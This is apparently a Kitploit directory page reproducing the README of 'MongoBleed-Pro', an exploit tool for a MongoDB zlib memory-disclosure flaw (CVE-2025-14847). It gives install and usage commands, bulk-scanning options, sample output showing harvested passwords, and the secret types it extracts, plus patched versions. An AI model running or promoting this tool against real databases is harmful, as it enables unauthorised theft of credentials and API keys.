Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-14847_Expolit — a critical memory disclosure vulnerability in MongoDB's zlib compression handling. This tool allows security researchers to extract sensitive data from vulnerable MongoDB instances. | Kitploit
Tools/GitHubGitHub/cybertechajju/cve-2025-14847_expolit
Memory ForensicsVulnerability AnalysisExploitationData ExfiltrationInformation GatheringPenetration TestingSecret DetectionLearning & EducationDatabase Security

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share
GitHubcybertechajju/cve-2025-14847_expolit

CVE-2025-14847_Expolit

a critical memory disclosure vulnerability in MongoDB's zlib compression handling. This tool allows security researchers to extract sensitive data from vulnerable MongoDB instances.

View Repository
33338 months agoReviewed by Kitploit

MongoBleed-Pro ☠️

CVE Python License Status

Advanced MongoDB Memory Leak Exploit Tool
Keep Learning | Keep Hacking with CyberTechAjju


🔥 About

MongoBleed-Pro is an advanced exploitation tool for CVE-2025-14847, a critical memory disclosure vulnerability in MongoDB's zlib compression handling. This tool allows security researchers to extract sensitive data from vulnerable MongoDB instances.

⚠️ Disclaimer

This tool is intended for authorized security testing and educational purposes only. Unauthorized access to computer systems is illegal. Always obtain proper authorization before testing.


💀 Vulnerability Details


🚀 Features

  • ☠️ Hacker-Style UI - Elite terminal interface with animations
  • ⚡ Multi-threaded Scanning - Fast memory extraction with configurable threads
  • 🎯 Auto Vulnerability Detection - Automatic vuln check before exploitation
  • 🔑 Secret Pattern Detection - Finds AWS keys, API tokens, passwords, emails
  • 📊 Real-time Progress - Live memory leak visualization
  • 💾 Data Export - Saves extracted data to files for analysis
  • 🌐 Bulk Scanning - Scan multiple targets from file

📦 Installation

root@kitploit:~
# Clone the repository
git clone https://github.com/cybertechajju/CVE-2025-14847_Expolit.git
cd CVE-2025-14847_Expolit

# Install dependencies
pip install -r requirements.txt

🎮 Usage

Basic Usage

root@kitploit:~
python3 mongobleed_pro.py

Target Specific Host

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100

Custom Port

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100:27018

Bulk Scanning

root@kitploit:~
python3 mongobleed_pro.py --file targets.txt

Advanced Options

root@kitploit:~
python3 mongobleed_pro.py --target 192.168.1.100 --threads 100 --min-offset 100 --max-offset 20000

All Options


📸 Screenshots

root@kitploit:~
╔══════════════════════════════════════════════════════════════╗
║  💀 INITIATING MEMORY EXTRACTION SEQUENCE 💀                 ║
╚══════════════════════════════════════════════════════════════╝

⚡ Target Acquired: 192.168.1.100:27017
   ✓ Port OPEN
   ☠️  VULNERABLE! Initiating attack...

  ◉ 0x0E31 │ nr_inactive_anon 134420\nnr_active_anon 110832...
  ☠️  LOOT ACQUIRED: 🔐 Password
      → admin_pass=SuperSecret123

╔══════════════════ EXTRACTION COMPLETE ══════════════════╗
║  💾 Bytes Extracted: 125,847
║  📦 Unique Fragments: 342
║  🔑 Secrets Found: 5
╚══════════════════════════════════════════════════════════╝

🔑 Detected Secret Types

  • 🔑 AWS Access Keys (AKIA...)
  • 🤖 OpenAI API Keys (sk-...)
  • 🐙 GitHub Tokens (ghp_...)
  • 🔐 Passwords & Secrets
  • 📧 Email Addresses

📁 Output Files

FileDescription
loot_<host>.txtExtracted secrets in readable format
dump_<host>.binRaw memory dump for manual analysis

🛡️ Mitigation

If you're a MongoDB administrator, update to patched versions:

  • MongoDB 8.0.10+
  • MongoDB 7.3.6+
  • MongoDB 7.0.19+
  • MongoDB 6.0.23+

👤 Author

CyberTechAjju

  • 🐦 Twitter: @CyberTechAjju

📜 License

This project is licensed under the MIT License - see the LICENSE file for details.


⭐ Support

If you found this tool useful, please give it a ⭐ on GitHub!


「 Keep Learning | Keep Hacking 」
Made with ❤️ by CyberTechAjju

Download Tool
PropertyDetails
CVE IDCVE-2025-14847
Vulnerability TypeMemory Disclosure
Affected VersionsMongoDB < 8.0.10, < 7.3.6, < 7.0.19, < 6.0.23
Root CauseBuffer over-read in zlib decompression
ImpactUnauthenticated remote memory leak
ArgumentDescriptionDefault
--targetTarget IP/URLInteractive prompt
--fileFile with target listNone
--threadsNumber of threads50
--min-offsetMinimum memory offset20
--max-offsetMaximum memory offset8192